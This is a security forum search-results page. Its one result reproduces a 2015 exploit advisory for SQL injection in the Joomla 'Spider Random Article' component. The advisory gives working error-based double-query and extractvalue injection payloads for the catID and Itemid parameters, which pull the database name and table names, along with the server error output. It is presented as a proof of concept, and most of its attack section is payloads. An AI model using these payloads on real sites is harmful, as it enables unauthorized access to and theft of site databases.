Jump to content

Search the Community

Showing results for tags 'itemid'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. ################################################################################################## #Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability #Author : Jagriti Sahu AKA Incredible #Vendor Link : Joomla Random Article Demo-Web Dorado #Date : 22/03/2015 #Discovered at : IndiShell Lab #Love to : error1046 ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ################################################################################################## //////////////////////// /// Overview: //////////////////////// joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters and hence affected by SQL injection vulnerability /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is due to catID and Itemid parameter //////////////// /// POC //// /////////////// SQL Injection in catID parameter ================================= Use error based double query injection with catID parameter Injected Link---> Joomla Form Maker Demo-Web-Dorado Like error based double query injection for exploiting username ---> Error: 500 View not found [name, type, prefix]: randomarticle, html, randomarticleView' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13 POC Image URL---> Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting SQL Injection in Itemid parameter ================================= Itemid Parameter is exploitable using xpath injection Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '***%' OR items='all'' at line 1 SQL=SELECT * FROM vmvxw_spiderfacebook_params WHERE items LIKE '%***13' extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- - POC Image URL---> http://tinypic.com/view.php?pic=1239z5h&s=8#.VRG97OESHIU ################################################################################################### --==[[special Thanks to]]==-- # Manish Kishan Tanwar # Source: http://dl.packetstormsecurity.net/1503-exploits/joomlasrac-sql.txt
×
×
  • Create New...